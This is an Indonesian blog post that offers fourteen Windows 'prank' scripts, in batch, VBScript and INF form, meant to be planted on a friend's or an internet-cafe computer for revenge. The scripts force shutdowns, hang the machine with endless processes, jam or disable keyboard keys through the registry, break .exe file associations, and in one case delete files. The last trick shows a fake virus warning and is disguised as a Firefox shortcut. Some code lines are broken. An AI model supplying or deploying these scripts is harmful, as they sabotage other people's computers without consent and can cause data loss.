RSS

Trick jail veRsI nOTepAd (dON’t uSe FOr hACK)

05 Jan

kumpulan Cara Hacker Komputer, berikut ini merupakan cara hack komputer yang super jail. cara ini sangat cocok buat balas dendam dengan teman Anda, dibutuhkan Aplikasi Notepad untuk membuat Jebakan Atau Virus ringan hingga yang sangat mematikan. baiklah saya akan berbagi pengetahuan tentang Cara Hacker Komputer, berikut langkah-langkahnya :

TRIK 1 – Membuat Forced Shoutdown
————————————————-
@echo off
msg * I don’t like you
shutdown -c “Error! You are too ******!” -s
————————————————-
simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN

TRIK 2 – Membuat Tombol Caps Lock menyala terus-menerus
——————————————————————
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
——————————————————-
seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : xhack.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)

TRIK 3 – Membuat Pesan Jail mucul terus
——————————————————
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

——————————————————

simpan kode script yang berwarna hijau dengan nama xhack.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.

TRIK 4 – Jail dengan Membuka Tutup CD/DVD room
——————————————————
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop——————————————————-
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis,

TRIK 5 – Membuat script mucul terus menerus
——————————————————-
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
——————————————————-
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
membuat script bermunculan terus menerus

TRIK 6 – Membuat Tombol Backspace menjadi eror – menekan terus menerus
——————————————————–
MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
———————————————————-
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file : All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya

TRIK 7 – Cara Membuat Pesan ‘ Komputer Anda Jelek Banget ‘ di Notepad/ Wordpad
———————————————————–
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “Komputer Anda Jelek Banget”
loop
———————————————————–
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan di Notepad dengan nama : xhack.vbs

TRIK 8 – Cara Membuat Notepad Terbuka Otomatis – terus menerus
————————————————————
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
————————————————————
simpan di Notepad dengan nama : xhack.BAT
maka Notepad akan terbuka terus menerus

TRIK 9 – Membuat Notepad dengan Pesan Jail
————————————————————-

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu ”
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k ”
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! ”
———————————————————–
simpan di Notepad dengan nama : xhack.vbs
ganti kode yang berwarna merah sesuai dengan selera anda.

TRIK 10 – Cara Membuat Memilih jawaban seperti Quiz di Notepad
———————————————————–
@echo off
title quiz hari ini🙂
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top ———————————————————–
simpan kode script berikut di Notepad dengan nama : xhack.BAT

TRIK 11 – Membuat Komputer Hang dengan Kode script Notepad
————————————————————-

start

start

start

start

start

start

start

start

start

start

start

start
———————————————————–
simpan di Notepad dengan nama : xhack.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )

TRIK 12 – Cara Mematikan Tombol Keyboard
————————————————————-
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF

Langsung kita mulai saja :

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
AddReg =AIUEO

[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00

—————————————

2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install

3. Log Off komputernya agar trik ini berfungsi.

NB :

Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.

Untuk menormalkannya, silahkan salin script berikut :

—————————————

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
DelReg =normal

[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”

—————————————

—> Simpan dengan nama “NORMAL.INF”
Klik kanan file ini, pilih >Install
Log Off komputernya.

sumber artikel hack : kidzoom

TRIK 13 – Cara Merusak Komputer teman / Warnet
—————————————————————
buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini
ASSOC.exe=.hank
lalu enter!
!!!!
program kayak ms.word/game ngambek jalan ! , n jika sudah puas banget jailnya dan mau ngembaliin-nya , tinggal buka CMD lagi. lalu ketik
ASSOC.exe=EXEFILE
—————————————————————

TRIK 14 – Cara Paling Jahil Jahat
—————————————————————-

1. BUka program notepad atau biar cepet menu RUN ketik notepad lalu enter

2. Copy kode ini dan pastekan di notepad kamu

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ………..”

3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi

nama apa, misal : pacebuk.bat dan SAVE di Dekstop (Recommended)

4. Sekarang klik kanan desktopmu dan pilih New => Shortcut

5. Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file

.bat yang kamu simpen tadi, misal tadi kamu save pada dekstop

6. Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu

dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya

sebagai tipuan aja)

7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah

mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai

Mozilla jadi pembahasannya pakai browser ini) .. Terus caranya gimana ?

Gampang.. tinggal kamu klik kanan file .bat tadi dan pilih change icon

Gak nemu icon mozilla ? Coba deh low cari di Program Files => Mozilla Firefox

Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin

iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi ..

Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu

praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet..

what will happen ? abis pastinya ..

 
Leave a comment

Posted by on 05/01/2012 in tips dan trick

 

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: